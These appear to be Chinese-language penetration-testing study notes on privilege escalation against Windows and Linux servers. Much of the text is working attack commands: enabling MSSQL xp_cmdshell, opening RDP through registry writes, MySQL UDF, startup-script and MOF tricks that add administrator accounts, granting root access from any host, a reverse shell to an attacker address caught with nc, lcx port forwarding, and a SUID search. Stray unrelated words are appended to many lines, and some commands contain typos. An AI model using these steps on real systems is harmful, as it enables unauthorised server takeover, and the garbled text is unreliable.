滲透測試學習 二十5、提權 下

溢出提權php

         主要是經過Windows漏洞利用來獲取系統權限mysql

         常見的溢出提權web

         巴西烤肉sql

         prshell

         步驟:數據庫

         一、經過信息蒐集查看服務器打了哪些補丁windows

         二、根據未打的補丁漏洞進行利用便可安全

 

破解hash提權服務器

         上傳pwdump.exe遠程獲取hash值ide

         拿到lc5彩虹表破解

         便可獲得管理員密碼

         須要管理員權限方可執行讀取hash操做

 

啓動項提權

         前提寫入的目錄須要寫入權限

         將批處理文件上傳到開機啓動項目錄等待管理員重啓便可

 

數據庫提權

         SQLserver數據庫提權

         mysql數據庫提權

         須要具有數據庫管理員權限才能夠執行提權操做

        

msSQL提權

         安裝組件

         開啓3389

         建立用戶

         提高權限

         完成

         sa帳號的獲取,查看config.asp、conn.asp等文件

 

msSQL安裝執行命令組件

         安裝cmd_shell組件

         exec sp_configure ‘show advanced options’, 1

         go

         reconfigure

         go

         exec sp_configure ‘xp_cmdshell’, 1

         go

         reconfigure

         go

 

3389操做語句

         開啓3389

         exec

         master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,0;--

 

         關閉3389

         exec

         master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentControlSet\Control\Terminal server’,’fDenyTSConnections’,’REG_DWORD’,1;--

 

刪除cmd_shell組件

         exec sp_configure ‘show advancer options’, 1

         go

         reconfigure

         go

         exec sp_configure xp_cmdshell; 0

         go

         reconfigure

         go

 

mysql數據庫提權

         udf提權

         啓動項提權

         maf提權

         反鏈端口提權

 

udf提權

         獲取到對方的mysql數據庫下的root帳號密碼

         一、查看網站源碼裏面數據庫配置文件

         (inc、conn、config.sql、common、data等)

         二、查看數據庫安裝路徑下的user.myd(/data/mysql)

         三、暴力破解mysql密碼,破解3306端口入侵

udf提權原理

         經過root權限導出udf.dll到系統目錄下,能夠經過udf.dll調用執行cmd

c:\winnt\udf.dll 2000

c:\windows\udf.dll 2003

如今基本上win的服務器就這兩個導出udf.dll

5.1以上版本須要導出到mysql安裝目錄lib\plugin\

create function cmdshell returns string soname ‘udf.dll’

select cmdshell (‘net user abc abc /add’);

select cmdshell (‘net localgroup administrators abc /add’);

drop function cmdshell; 刪除函數

 

啓動項提權

         一、查看咱們進入數據庫中有什麼數據表

         mysql>show tables;

         默認狀況下,test中沒有任何表的存在

         如下爲關鍵部分

         二、在TEST數據庫下建立一個新的表

         mysql>create table a (cmd text);

         此時建立了一個新表,表名爲a,表中只存放一個字段名爲cmd的text文件

         三、在表中插入內容

         mysql>insert into a values (「set wshshell=createobject(「」wscript.shell」」)」)

  mysql>insert into a values (「a=wshshell.run (「」cmd.exe /c net user 1 1 /add」」,0)」);

  mysql>insert into a values (「b=wshshell.ru (「」cmd.exe /c net localgroup administrators 1 /add」,0)」);

  注意,雙引號和括號以及後面的「0」必定要輸入,用這三條命令來創建一個VBS的腳本程序。

  四、mysql>select * from a;

  此時表中有三行數據,就是前面的VBS的腳本程序

  五、輸出表爲一個VBS的腳本文件

  mysql>select * from a into outfile 「c://document//administrator//[開始]菜單//程序//啓動//a.vbs」;

  六、重啓

 

mof提權

         第一種方法:

         上傳mof.php

         輸入相關信息,執行命令,提權

         第二種方法:

         上傳x.mof

         使用select命令導出到正確位置

         select load_file(‘c:/wmpub/nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’

         容許外部地址使用root用戶鏈接的SQL語句

         grant all privileges on *.* to ‘root’@’%’ identified by ‘root’ with grant option;

 

反鏈端口提權

         利用mysql客戶端工具鏈接mysql服務器,而後執行如下操做

         一、執行命令

         mysql.exe –h 172.16.10.11 –uroot –p

         enter password:

         mysql>\.c」\mysql.txt

         mysql>select backshell(「yourip」,2010);

         二、本地監聽反彈的端口

         nc.exe –vv –l –p 2010

         成功後,會得到一個system權限的cmdshell

 

內網端口轉發

         內網主機輸入命令

         lcx.exe –slave 外網ip 外網端口 內網ip 內網端口

         lcx.exe –slave 200.1.1.1 1111 192.168.1.2 3389

         外網主機輸入命令

         lcx.exe –listen 111 1311

         開啓3389

         使用

         批處理文件開3389

         使用sql語句開3389

         使用exe開3389

         使用vb開3389

 

一些命令的利用

         type E:\wwwroot\web.config 查看文件內容

         cacls命令

         /T:更改當前目錄及其有子目錄中指定的acl

         /E:編輯acl而不替換

         /C:在出現拒絕訪問錯誤的時候繼續

         /G Userver:perm:賦了指定用戶訪問權限,perm表明不一樣級別的訪問權限,其值能夠是R(讀),W(寫),C(該),F(安全控制)等

/R user:撤銷指定用戶的訪問權限,注意該參數僅在與「/E」一塊兒使用的時候有效

  要修改一個文件的權限必要條件

  要有USERS組的徹底控制權限

  cmd權限

 

Linux提權

         內核溢出提權

         mysql ndf提權

         利用SUID提權

         利用環境變量,劫持該勸的程序提權

 

內核溢出提權

         查看內核

         uname –r

         反彈shell執行命令

         上傳exp

         編譯

         執行

         根據內核版本查找對應的漏洞

         收集exp

         能夠從www.exploit-db.com查找漏洞利用

 

mysql udf提權

         上傳庫文件

         執行庫文件建立命令執行函數

        

利用SUID提權

         尋找系統裏能夠用的SUID文件來提權

         $find /-perm –u=s –type f 2>/dev/null

相關文章
相關標籤/搜索